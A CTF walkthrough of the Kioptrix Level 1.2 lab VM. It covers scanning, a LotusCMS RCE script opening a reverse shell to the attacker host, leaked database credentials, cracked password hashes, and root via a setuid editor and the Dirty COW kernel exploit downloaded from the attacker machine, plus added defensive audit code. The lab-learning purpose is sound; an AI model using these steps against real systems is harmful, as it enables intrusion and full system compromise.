
Kioptrix Level 1.2 CTF VM WalkThrough

VM : Kioptrix: Level 1.2 (#3)

Download Link : https://download.vulnhub.com/kioptrix/KVM3.rar

VM HOST : VMware Workstation/Player
Network : Bridged mode with DHCP

Nmap Scan

$ nmap -A 192.168.1.5 -oN nmap.scan

# Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
Nmap scan report for 192.168.1.5
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.8 - 2.6.30
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   0.04 ms 172.17.0.1
2   0.41 ms 192.168.1.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds

Findings :

  • An Apache web server (2.2.8 with PHP 5.2.4) is running on port 80.
  • SSH (OpenSSH 4.7p1) is running on port 22.

Checking the web app

$ python urlCroll.py http://kioptrix3.com/

http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Blog
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com//gallery

Link : urlCroll.py

http://kioptrix3.com/index.php?page=index

http://kioptrix3.com/index.php?system=Admin

http://kioptrix3.com/index.php?system=Blog

Also note that the web app is running on LotusCMS.

There is also a gallery app, but to access all of its content, map the IP address of the VM to kioptrix3.com by adding it to the /etc/hosts file (the redirect has to go through tee, since a plain sudo echo >> would open the file as the unprivileged user):

echo '192.168.1.5     kioptrix3.com' | sudo tee -a /etc/hosts

The URL of the gallery app is:

http://kioptrix3.com/gallery

Scanning Web Application

Nikto scan output:

$ nikto -host kioptrix3.com

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.5
+ Target Hostname:    kioptrix3.com
+ Target Port:        80
+ Start Time:         2020-04-20 18:46:19 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-04-20 18:46:28 (GMT5.5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A phpMyAdmin directory is found.

Similar results from dirb:

$ dirb http://kioptrix3.com | tee dirb.scan

==> DIRECTORY: http://192.168.1.5/cache/
+ http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126)

==> DIRECTORY: http://192.168.1.5/core/controller/
+ http://192.168.1.5/core/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
+ http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
+ http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
+ http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)

And the scan results from dirsearch:

$ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport

$ cat dirsearchReport | grep 200

200     2KB  http://kioptrix3.com/cache/
200   688B   http://kioptrix3.com/core/fragments/moduleInfo.phtml
200    23KB  http://kioptrix3.com/favicon.ico
200     2KB  http://kioptrix3.com/index.php
200     2KB  http://kioptrix3.com/index.php/login/
200   146B   http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
200     8KB  http://kioptrix3.com/phpmyadmin/

We can log in to phpMyAdmin with the default user admin and a blank password, but only the information_schema database is accessible with these default credentials.

Exploiting LotusCMS :

A quick search for LotusCMS vulnerabilities shows that version 3.0 is vulnerable to RCE (remote code execution).

Link : https://github.com/Hood3dRob1n/LotusCMS-Exploit

To exploit this, start a listener on the attack machine, then run the exploit script:

$ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
$ chmod +x lotusRCE.sh
$ ./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.1.3      <----- IP address of local machine
What PORT?
1234             <---- listener port number

OK, open your local listener and choose the method for back connect:
1) NetCat -exploit    3) NetCat Backpipe    5) Exit
2) NetCat /dev/tcp    4) NetCat FIFO
#? 1

and we get the reverse connection:

Listening on [0.0.0.0] (family 0, port 1234)
Connection from kioptrix3.com 37530 received!
whoami
www-data

Getting a tty shell:

python -c 'import pty;pty.spawn("/bin/sh")'
$

Enumerating files

Looking at the web directory:

$ pwd
pwd
/home/www/kioptrix3.com
$ ls
cache  data    gallery  index.php  style
core   favicon.ico  gnu-lgpl.txt  modules    update.php

$ cd gallery

$ ls
BACK     gfooter.php     logout.php        readme.html    tags.php
db.sql     gfunctions.php  p.php       recent.php     themes
g.php     gheader.php     photos       register.php   version.txt
gadmin     index.php     photos.php        scopbin      vote.php
gallery.php  install.BAK     post_comment.php  search.php
gconfig.php  login.php     profile.php       slideshow.php

$ cat gconfig.php
<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

In the gallery web directory we find the database credentials “root/fuckeyou”. With them we can log in to phpMyAdmin, and in the gallery database we find two usernames with hashed passwords:

dreg         fb887aabd50f243b3f155c0f85
loneferret   5badcaf789d3d1d09794d8f021f40f0e

These hashes are cracked with crackstation.net:

dreg        :  Mast3r
loneferret  :  starwars

With the credentials “loneferret/starwars” we can ssh into the machine:

$ ssh loneferret@192.168.1.5
loneferret@192.168.1.5's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$

But this user cannot access the /root directory:

loneferret@Kioptrix3:~$ cd /root
-bash: cd: /root: Permission denied

Privilege Escalation

Method 1 :

There is a file CompanyPolicy.README in the home directory, which describes the command ‘sudo ht’:

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ sudo ht
sudo: no passwd entry for root!

loneferret@Kioptrix3:~$ which ht
/usr/local/bin/ht

loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht

ht is a file editor/viewer/analyzer for executables. In this case it has the setuid bit set, so it runs with root privileges, and we can use it to edit files that normally require root access. That means we can escalate our privileges by editing /etc/sudoers to allow the user loneferret to run /bin/su, which gives us root access.

Open the file with:

sudo ht /etc/sudoers

Which looks like this:

To switch to text mode, press F6 and choose text mode.

We have to change ‘!/usr/bin/su’ to ‘/bin/su’.

To edit the file, switch to “hex” mode (press F6) and press F4 to edit. Now overwrite the bytes of “!/usr” in “!/usr/bin/su” with “20” (hex for space), which looks like:

Before :

After :

Then press F2 to save.

Now just run the command sudo su:

loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# whoami
root

That's it, we get the root shell!

Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#
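The two weaknesses Method 1 relies on, a setuid editor and a sudoers rule that tries to deny su by negation, are exactly what a defender should be auditing for on a host like this. The following is an added example, not part of the original post: the sudoers text and the file modes are constructed samples modelled on what the post shows, and the EDITOR_NAMES set is an assumption to adapt per system.

```python
import re
# Programs that read and write arbitrary files; via sudo or a setuid bit they
# are equivalent to root (ht is the one found on this box). Assumed list.
EDITOR_NAMES = {"ht", "vi", "vim", "nano", "less", "more", "emacs"}

# Constructed sample resembling the rule edited in the walkthrough.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""
# Constructed (path, st_mode, owner) triples as os.stat() would report them.
SAMPLE_FILES = [
    ("/usr/local/bin/ht", 0o106755, "firefart"),  # -rwsr-sr-x, as in the post
    ("/usr/bin/passwd", 0o104755, "root"),        # setuid, expected
]

# user host=(runas) [TAG:] command, command, ...
USER_SPEC = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.*)$")

def audit_sudoers(text: str) -> list:
    """One finding per weak construct in the user specifications."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        match = USER_SPEC.match(line)
        if not line or line.startswith("Defaults") or not match:
            continue
        user, cmds = match.groups()
        if "NOPASSWD:" in cmds:
            findings.append(f"{user}: NOPASSWD, no re-authentication before root actions")
        for cmd in re.sub(r"\b[A-Z]+:", "", cmds).split(","):  # drop tags
            cmd = cmd.strip()
            if cmd.startswith("!"):
                findings.append(f"{user}: negated {cmd[1:]} is a deny-list, not a control")
            elif cmd.rsplit("/", 1)[-1] in EDITOR_NAMES:
                findings.append(f"{user}: {cmd} rewrites any file as root (sudoers, passwd)")
    return findings

def risky_setuid(files: list) -> list:
    """Flag setuid/setgid binaries (mode bits 0o4000/0o2000); editors are critical."""
    out = []
    for path, mode, owner in files:
        if mode & 0o6000:
            note = f"{path}: setuid/setgid, owner {owner}"
            if path.rsplit("/", 1)[-1] in EDITOR_NAMES:
                note += ", editor: any user can rewrite files as that owner"
            out.append(note)
    return out
```

On a real host, feed audit_sudoers the output of visudo -c -f or the file itself, and build the risky_setuid input from os.walk plus os.stat over the filesystem.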

Method 2 :

This method is used from within the reverse shell obtained with the LotusCMS exploit.

First, check the OS and kernel versions:

$ cat /etc/issue
Ubuntu 8.04.3 LTS \n \l

$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"

$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009

So the kernel version is 2.6.24. Searching for exploits for Linux kernel 2.6.24, I found the following: https://www.exploit-db.com/exploits/40839

According to its documentation, the exploit creates a new user ‘firefart’ with root privileges. Download it and test it:

$ cd /tmp

$ wget 192.168.1.3:8000/exploit.c

$ gcc -pthread exploit.c -o exploit -lcrypt
exploit.c:193:2: warning: no newline at end of file

$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345

Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

The exploit seems to work; now try to log in as the new user “firefart” with the password 12345:

$ su firefart
Password: 12345

firefart@Kioptrix3:/tmp# cd /root

firefart@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18

firefart@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)

We can access the /root directory.
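From the defender's side, the tell-tale artefact of this method is the new UID-0 line in /etc/passwd (plus the /tmp/passwd.bak copy the exploit leaves behind). The following is an added example, not part of the original post or of the exploit: it parses constructed passwd contents modelled on the line shown in the exploit output and reports the indicators a file-integrity check should raise.

```python
# Constructed "before" copy (what the exploit saves as /tmp/passwd.bak) and the
# live file with the line shown in the exploit output above.
PASSWD_BEFORE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
"""
PASSWD_AFTER = PASSWD_BEFORE + "firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash\n"


def audit_passwd(text: str) -> list:
    """Return indicators that /etc/passwd has been tampered with."""
    findings, seen, root_seen = [], set(), False
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append(f"line {n}: malformed entry ({len(parts)} fields)")
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        if name in seen:
            findings.append(f"line {n}: duplicate user {name}")
        seen.add(name)
        if uid == "0":
            root_seen |= name == "root"
            if name != "root":
                findings.append(f"line {n}: extra UID-0 account {name} ({home}, {shell})")
        if pw == "":
            findings.append(f"line {n}: {name} has an empty password")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Hashes belong in /etc/shadow; a hash here bypasses shadow entirely.
            findings.append(f"line {n}: {name} carries a password hash in /etc/passwd")
    if not root_seen:
        findings.append("no UID-0 account named root (first line overwritten?)")
    return findings


def new_lines(backup: str, live: str) -> list:
    """Entries in the live file that the backup lacks, in file order."""
    old = set(backup.splitlines())
    return [entry for entry in live.splitlines() if entry and entry not in old]
```

A periodic run of audit_passwd over /etc/passwd, or an alert on any write to it outside package and user-management tooling, catches this class of change regardless of which kernel bug was used.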

This post is licensed under CC BY 4.0 by the author.